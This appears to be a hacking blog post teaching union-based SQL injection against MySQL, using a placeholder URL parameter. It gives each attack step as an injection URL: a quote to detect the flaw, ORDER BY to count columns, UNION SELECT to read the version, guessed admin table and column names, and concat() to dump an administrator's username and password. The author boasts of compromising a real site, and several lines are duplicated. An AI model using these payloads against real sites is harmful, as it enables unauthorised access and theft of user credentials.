I’ll make it easy and fast,simple and less theory.What Will You Read About:
*Check For Vuln.
*Check How Much Columns Are There
*Check Does Union Works
*Check For Version
*Getting table and column name &Pulling Data Out.
Okey Letz start…
We are going to use an example like this:
Code:
http://site.com/news.php?id=5*Check For Vuln.
Checking for vuln is same as in Normal SQL Injection With a string(‘) so the url will look like this:
Code:
http://site.com/news.php?id=5'and we will get something like
Code:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the rightthis means that the site is vuln to MySQL Injection 
*Check How Much Columns Are There
Like i said like in normal MySQL INjection we do this with
Code:
Order BySo we go now to the url and try to find how many columns are there:
Code:
http://www.site.com/news.php?id=5 order by 1/* < -- no error http://www.site.com/news.php?id=5 order by 2/* <-- no error http://www.site.com/news.php?id=5 order by 3/* < -- no error http://www.site.com/news.php?id=5 order by 4/* < -- errorWe got some message like
Code:
Unkown Column "4" in "order clause"This means that there are 3 columns
*Check Does Union Works
With union we can select more data in one sql statement.
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/ *if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works
*Check For Version
So when we tryped this:
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/*some numbers lets say 2 have showed us on the screen now we change 2 into
Code:
version() or @@versionso the url will looks like this:
Code:
http://www.si te.com/news.php?id=5 union select 1,@@version,3/*and we get like a result something like this:
Code:
4.1.33-log or 5.0.45 or similar.*Getting table and column nameAnd now is the real part where you learn about how to do this shit.
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…)
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…)
we need to guess the table names and column names.So this is the hard part in this injection.
-Why?
Well everysite is not on english langue i have recently hacked a site from belgium the columns and tables weren’t like
-Why?
Well everysite is not on english langue i have recently hacked a site from belgium the columns and tables weren’t like
Code:
username,user,userid,password,members.admin ectthey were completly different so this makes the injector(You/Hacker) works a lot harder you need to search for that kind of words than translate them a lotz a lotz of work and maybe everything will be for nothing. That is why i hate this Injection 
So letz say the site have an english table names and column names .
common table names:
common table names:
Code:
user,usres,admin,administrators,members,member,logincommon column names:
Code:
username,useremail,n_user,user_name,user,password,pass,upass,userpassword,userpass,hash,email,umailNow letz check if there is a table name admin we do that doing this:
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*So if we see the number 2 on the screen table admin exsists if doesnt exsists probably we will get an error
so we move on we know there is a table with name admin now its time for the columns
Code:
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*If we get an error column name “username” doesn’t exsists
so we try other:
so we try other:
Code:
http://www.site.com/news.php?id=5 union all select 1,uname,3 from admin/*It returns an data ex:
Code:
AdministratorSo we guessed the column user now its time for password:
Code:
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*Damn returns error there is no column name “password” lets try other:
Code:
http://www.site.com/news.php?id=5 union all select 1,upass,3 from admin/*w00t we got:
Code:
AdminPasswordSo Now we know that there is an table name:
Code:
adminwith columns:
Code:
uname and upassand we pulled the data from them and get:
Code:
Administraotr:AdminPasswordAlso we can use contact() to get everything in one request:
Code:
http://www.site.com/news.php?id=5 union all select 1,concat(uname,0x3a,upass),3 from admin/*and we get:
Code:
Administrator:AdminPassword
Leave a comment below.
No comments:
Post a Comment